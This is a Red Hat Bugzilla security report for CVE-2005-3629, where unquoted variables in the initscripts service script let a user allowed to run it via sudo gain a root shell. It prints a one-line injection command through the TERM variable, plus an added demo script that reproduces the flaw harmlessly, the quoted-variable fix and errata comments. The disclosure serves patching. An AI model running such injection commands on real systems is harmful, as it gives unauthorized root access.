Bug 174849

Summary: CVE-2005-3629 root shell can be gained from service if run through sudo
Product: Red Hat Enterprise Linux 4
Reporter: Bill Nottingham <notting>
Component: initscripts
Assignee: Bill Nottingham <notting>
Status: CLOSED ERRATA
QA Contact: Brock Organ <borgan>
Severity: medium
Priority: medium
Version: 4.0
CC: poelstra, rvokal, security-response-team
Keywords: Security
Hardware: All
OS: Linux
Whiteboard: impact=moderate,embargo=yes,reported=20051202,source=bugzilla
Fixed In Version: RHSA-2006-0016
Doc Type: Bug Fix
Last Closed: 2006-03-07 18:23:23 UTC
Bug Depends On: 174825
Bug Blocks: 168429

Description Bill Nottingham 2005-12-02 18:55:13 UTC
+++ This bug was initially created as a clone of Bug #174825 +++

Description of problem:
By setting one of various environment variables to "valid" but yet "invalid"
values and then running service through sudo, one can gain a root shell as a
normal user.

Version-Release number of selected component (if applicable):
7.31.18.EL

How reproducible:
Always

Steps to Reproduce:
1. Run the following command:
    
     TERM="$TERM /bin/bash -c /bin/bash" sudo /sbin/service network status

Note the actual service and option for the service really doesn't matter.
  
Actual results:
Instant root shell.

Expected results:
No root shell.

Additional info:
The problem (and there may be others) is that environment variables, when
expanded in the service script, are not quoted.  Here is the particular
offending line in this case:

   env -i LANG=$LANG PATH=$PATH TERM=$TERM "${SERVICEDIR}/${SERVICE}" ${OPTIONS}

If the vars were quoted as in:

   env -i LANG="$LANG" PATH="$PATH" TERM="$TERM" "${SERVICEDIR}/${SERVICE}" ${OPTIONS}

then this exploit would not be possible (save maybe with some diddling of IFS).

The problem is mitigated by the fact that one has to configure something like 
sudo to allow a user to run service in some fashion, and also in that the 
problem can be side stepped by having the sudo entry run something that runs 
service that properly cleans the environment before execing service.
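The following script is an added example, not part of the bug report or of initscripts, that reproduces the word-splitting flaw in the `env -i` line quoted above without sudo or root. The "service" is a stand-in script (constructed here) that only prints its argv, `$SERVICEDIR`, `run_unquoted` and `run_quoted` are names chosen for this demo, and the injected payload runs `/bin/echo INJECTED` instead of a shell so the outcome is visible on one line.

```sh
#!/bin/sh
# Added example: unquoted vs. quoted expansion of TERM in a service wrapper.
# Nothing here needs sudo; the point is what argv env(1) receives.

# Constructed stand-in for ${SERVICEDIR}/${SERVICE}: prints its arguments.
SERVICEDIR=$(mktemp -d)
SERVICE=demo
trap 'rm -rf "$SERVICEDIR"' EXIT
cat > "$SERVICEDIR/$SERVICE" <<'EOF'
#!/bin/sh
printf 'demo ran with argv:'
for a in "$@"; do printf ' [%s]' "$a"; done
printf '\n'
EOF
chmod +x "$SERVICEDIR/$SERVICE"

# Vulnerable wrapper: the same line as in the bug report. $TERM is expanded
# unquoted, so a TERM containing spaces becomes several words; env(1) takes
# the first word without "=" as the command to run and never reaches the
# real service path.
run_unquoted() {
    TERM=$1
    OPTIONS=$2
    env -i LANG=$LANG PATH=$PATH TERM=$TERM "${SERVICEDIR}/${SERVICE}" ${OPTIONS}
}

# Hardened wrapper: the expansions are quoted, so TERM stays one argument
# (TERM=... is just an assignment to env) and the service runs as intended.
run_quoted() {
    TERM=$1
    OPTIONS=$2
    env -i LANG="$LANG" PATH="$PATH" TERM="$TERM" "${SERVICEDIR}/${SERVICE}" ${OPTIONS}
}

# Attacker-controlled TERM: a plausible terminal name followed by a command.
# In the real report the trailing part was "/bin/bash -c /bin/bash".
PAYLOAD='xterm /bin/echo INJECTED'

printf 'unquoted: %s\n' "$(run_unquoted "$PAYLOAD" status)"
printf 'quoted:   %s\n' "$(run_quoted "$PAYLOAD" status)"
```

With the unquoted wrapper, env runs `/bin/echo INJECTED <path to demo> status`: the injected command executes and the service path is demoted to an argument. With the quoted wrapper, the demo script runs and sees only `[status]`. Note that quoting the expansions removes the splitting bug but `env -i` does not sanitize anything before it is invoked, which is why the report still recommends a sudo target that cleans its environment before execing service.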

Comment 2 Bill Nottingham 2005-12-02 20:16:06 UTC
Fixed in 7.93.23.EL-1.

Comment 6 Josh Bressers 2006-03-07 15:45:06 UTC
Lifting embargo.

Comment 7 Red Hat Bugzilla 2006-03-07 18:23:23 UTC
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2006-0016.html